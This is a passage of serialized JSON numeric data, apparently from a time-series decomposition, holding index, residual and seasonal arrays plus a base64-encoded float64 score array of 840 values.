1180,1364286071,1429325592,1359775006,1399156689,1415017971,1387243579,1403773141,1381284525,1247614350,1271293168,1265103404,1264873271,1425270772,1420775243,1460056735,1431381987,1445498423,1445056269,1437943379,1439611996,1439344539,1445141681,1416162250,1398771596,1312187056,1442107795,1373747172,1429234820,1432510050,1429995041,1424670065,1412894903,1286635120,1303399766,1301485250,1309222091,1395829866,1396272296,1416398636,1410498249,1411237964,1419335225,1410839819,1403882789,1409707902,1427817478,1365901383,1349867884,1260242566,1365139634,1294151975,1346563071,1319692036,1309194234,1274344889,1267857223,1102552609,1092326765,1073822013,1055193310,1237470098,1107731873,1088552881,1088072252,1053365749,1051208792,1029153696,999684088,1003025411,1036113052,940032299,926625185,838953787,937962579,887107732,961458514,936412131,942588334,914622753,948271771,783342000,786655133,786519759,781831387,1115847925,873635109,851611122,897800580,863594719,890973997,887705622,872085135,905005999,979823454,868639326,874281090,817554391,907975827,881632015,976391884,950248217,962277823,929343918,989469820,805339853,804119604,804171595,791107817,1282711661],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839],\"residual\":[-11615960,-1950242,-6962417,14084958,5196383,-14682202,28680487,-2367079,-41197360,-4920246,11479753,-23170089,-28170706,11419756,11767734,1472476,-25259914,17188979,48485704,14279575,27178445,48347990,44381862,-36664053,-6756640,2987174,14308363,-49348795,-14448623,27433823,-57500615,-1297935,37085573,26504937,-21175674,45985335,16535620,-30326641,3077079,5063533,41851484,12927096,-28720082,8524690,-23926816,-22881694,-32046934,6303546,4937204,-25640914,-29124234,42093917,-1306834,-17313274,1681735,6304541,44399096,-34600121,13153222,-39417974,41700560,27850040,-18996392,-12257002,4442780,-51371881,-33495561,-31004599,-2685182,-30407478,-4394284,67684799,55237552,45622112,32113744,3671600,22877165,-454559,67790606,-1281531,-43228614,3921005,-11240317,44308824,-14009280,-13264660,-24148724,3630941,-37467022,-8613403,-60552216,-28598403,-44367979,-95020561,-96844975,51467812,51118675,31529711,76640891,43832405,37279620,97832030,16127645,30058065,61874720,42512286,67277780,16478173,33400072,118564632,81327360,102549118,88665565,84652977,146787883,127246545,189481154,219881135,192460234,-203292500,-214384314,-175112341,-169765474,-166867211,-117132691,-45209602,-140373356,-83612612,-65663055,-84547976,-51874001,-11137807,-54502991,-77307448,8626809,-37838760,13140160,23396721,318888,92131,-11544613,16918070,20442147,-3034243,17402926,-8516623,-13411529,12720169,7152270,-293301092,15733198,32024074,-39056067,-6170851,-67902598,-63359880,-29429790,-63453213,-137996431,-88729460,-138371357,-109808635,-130540117,-174742950,-199543501,-215979032,-212572005,216568847,143596087,194872065,150312017,137148334,86972118,226121610,82757819,170731091,53195007,41669857,66480478,4026371,18617036,12087725,73679163,38591346,20200900,25079704,55616227,100996561,42973513,73318515,61853053,-65331503,-3593038,-40323355,-65184750,-29825008,-16638118,19360458,-12823540,-298588127,2357572,-9405710,10639849,56905922,24601106,64107984,-4000998,-13503790,54142046,21215123,24369135,-7492269,54530794,-10604818,33836251,-26464989,-20762132,-35446573,23767773,-23713048,-11795016,-8886768,14675103,90305769,1709271,21375839,-29135540,-2834081,18877112,-22700567,-2549115,-17077189,-10675044,-24680750,-45166316,-15750811,-23598199,15118077,-14998098,5904792,-6891564,17920882,-6835941,49081289,20438664,36327488,-11745196,77067690,-1511271,10974353,14552780,-71223716,-23678791,-22615565,-4357854,11614447,-24926562,-36356877,-53139629,-25599843,-59417670,-78141849,-85147787,80444402,59231096,79729116,99093798,28174990,71063278,25856786,56986462,32122277,50679562,61518101,38644185,-54191461,76875216,66943462,105914856,111301498,65525488,153348566,178615033,128264915,159762190,215836867,245380517,-191917253,-176060477,-216534516,-219912617,-142481071,-163708050,-144357769,-138458324,-102365646,-79538764,-102243380,-58302715,261330284,-58555917,-55340277,-70488621,-50414799,6508462,-38932680,-38363914,4324946,25808355,-32314043,-48328027,-13144886,22864740,6250379,13623549,-49305154,-34228458,6236442,-3830843,5321315,-7726193,-52696245,-39281111,-150397420,-99393716,-26941885,-75745799,-94177007,-105470348,-106245781,-142037076,-169471301,-202027575,-178019909,-181764048,186404262,160790822,190840217,145320031,187978205,171808482,92218707,106401447,47038636,21295632,86648266,48561262,-175456,108656694,26116318,39040186,28444180,32896059,33880246,71065072,26611542,67728781,37297853,24859910,-60739819,-66603530,-71142689,-2384421,-72646239,-55254309,-6354183,-7394588,24561611,16675782,675513,36206047,-23907672,-14864909,21876459,33907048,-144200198,33599797,22600740,29224970,82618189,10974438,43998647,65625959,1599028,-27747662,-21412596,-51341800,-1021879,-4544211,6671087,-25266267,-32540023,7116664,-14642281,-34346828,5861694,-47719337,-20661695,-19513182,295773799,6524107,-48493363,-54052697,-62240004,-3056964,-19203872,-35468834,-4190442,58860348,54305873,29915727,38249573,2473050,16478611,-13050906,-17545644,964617,-37769565,-21579208,30783887,50681630,-17452322,-31625560,-95276804,-58679148,2553025,-7354185,-40028476,-54772918,-60709744,-34979178,91340662,39593566,42966172,48239402,64216674,29956830,20549469,55231218,62925647,50264137,89050329,97947583,37304412,33743598,41637079,101536379,53549447,109960756,124224232,106056480,160049076,188124698,193374082,168907366,-185200822,-188685340,-191815926,-156032581,-199423161,-82127558,-149391409,-97070032,-60210796,-85455308,-66328129,-69841251,-74872386,-15793917,11189043,-34557110,-39652688,25346903,-42406405,17926112,21903219,-25582689,4113097,-2078378,-24460065,-36949246,-8529592,-24029562,19383325,-24426421,19239677,11987018,-58084898,-58574771,-49772387,-58646768,-32369206,-101699133,-63491340,-69778957,-101748161,-145988414,-103326167,-159702786,-176575817,-214115753,-189332420,-193645042,198750654,217656794,175802170,171268805,160636637,119269938,131142274,50450676,118831175,112247059,77764728,47319753,65437293,54972963,13768911,25813444,23476825,11121795,24835439,75213925,53795939,97402804,38069401,55298719,-76185459,-61298422,-49173275,-55683856,-54041079,-47321998,-72898438,7387349,-62394992,-49532222,-5198569,9758034,-24129503,20066881,33742091,10255194,67213643,29128046,33852721,30030828,-13948931,59220027,47090622,45371265,-80925429,2101874,-7460066,9544184,-46560617,-20913074,24591091,-22196984,16051136,39418699,25386648,-14595866,11505228,82179,-16904538,-13920844,-24326167,21015077,-308828,-47722642,36221427,-44813258,-42652109,-17865035,-48899143,15761838,49099482,7050766,16842535,16790889,31178068,17391603,26026856,-4061977,-17799382,27519983,21731317,-7694251,-30732383,-50391452,-47859258,-25818239,-17935617,-55840148,-74004367,-56625408,-52057252,-95954198,353181952,48092372,7112546,70400972,72037536,80253946,18546375,56694206,13355026,-6959610,5252562,49365724,34629818,79507669,68815536,135929836,88220356,102754917,79290223,158186634,121904408,150526865,184871640,236543603,-294276852,-173067934,-142485038,-191671872,-117808986,-163397185,-142037876,-115520032,-67850902,-41578014,-52136433,-79742152,-41939371,-73909980,-2808524,-37825450,-5720640,-32578139,-29747,-10529178,32782742,17806164,18966662,-20825461,-59242918,-8728174,-4304702,4292578,-47043719,26621738,26217398,-31889720,-22681221,-3236212,-20197815,-37103161,-84593333,-78076434,-75524639,-94915878,-80916631,-125585374,-119940980,-145867435,-144971692,-202876101,-210009265,-224511788,193589388,183267231,134857833,129094322,167091071,87893077,85505963,131954011,68736718,41457806,65579965,82150965,86909615,63756571,50158163,64551854,5018531,61060792,50632414,81518530,16450470,50716871,41083770,96761626,-48854676,-85542111,-43936829,-10368990,-71550826,-39879723,-14259568,-64847922,-23394299,14605105,-9501058,-14616893,-35031720,15215713,-5844864,6693520,34060486,186436,5906445,1184340,48630220,59952592,44484325,-11705383,-29393070,-12540741,-10361813,-31422725,-7704584,36121164,-41324938,22054577,38493968,-1855326,-14511210,-58866265,41419046,2760438,-10264991,-26447432,11240993,13426983,-9987867,-21016234,-20452112,-10460352,-2052269,4430794,17684166,74506929,29729922,17084279,35464315,-46453436,31162371,29252806,-27148371,-44996208,22992697,42983918,139483613,-27702450,-12013266,-39464043,-42742846,-72459434,-12473809,-51650739,-72518741,-84703239,-65473374,-50377611,75357004,11227850,89345453,64924907,69524970,84278884,85562727,13153495,27785691,65775348,70280174,91180060,-267089725,88083673,79333431,125235298,99739134,144605192,98592610,112080812,181904766,195576122,162322757,206207631,-277261311,-168636051,-157574196,-143242154,-128268232,-64900550,-109659855,-72465728,-31525704,-80341769,-105449967,-73994515,35550814,-23950264,-52346188,-52714166,-83249351,-20323152,-54703060,-18160681,-45648132,-64431381,-27747182,-75415676,-120950455,101209861,64851876,67922142,49750536,9517350,29395189,33130671,5642863,28594855,32326535,-4106735,58744656,-29188883,-7106168,-23040462,11061139,-52064989,-16154255,-42799457,-50851080,-41608878,-58056590,-46525477,187044904],\"score\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[840]},\"seasonal\":[93515986,90183587,63387257,86512728,86106072,105324730,89548775,52531656,63431446,49672271,43255924,-7902940,9604818,-39774346,20478825,-21862136,8542505,-31098483,-19147780,-175118885,-214495129,-165357089,-161602268,45763822,81746572,66043248,54705231,67301852,78183958,80340896,76425515,40281820,65656500,26360474,38401191,284897,12894133,-12467611,21260341,867701,18610953,-15767590,-10832157,-160723977,-180358494,-147966456,-150748756,34631614,65275193,40142382,44578984,44946944,68673828,55372679,59639386,27563375,66617003,4498985,33197035,8275439,14153083,13035840,24472447,23425781,29851202,3135511,2621831,-143389494,-144671034,-124441916,-134815456,19651272,43735129,11197944,30103479,24768433,58976790,27537527,44704449,15604895,64987193,-18004866,31088876,12948608,15054510,41257683,31981531,47220418,41881715,26907921,26547082,-1205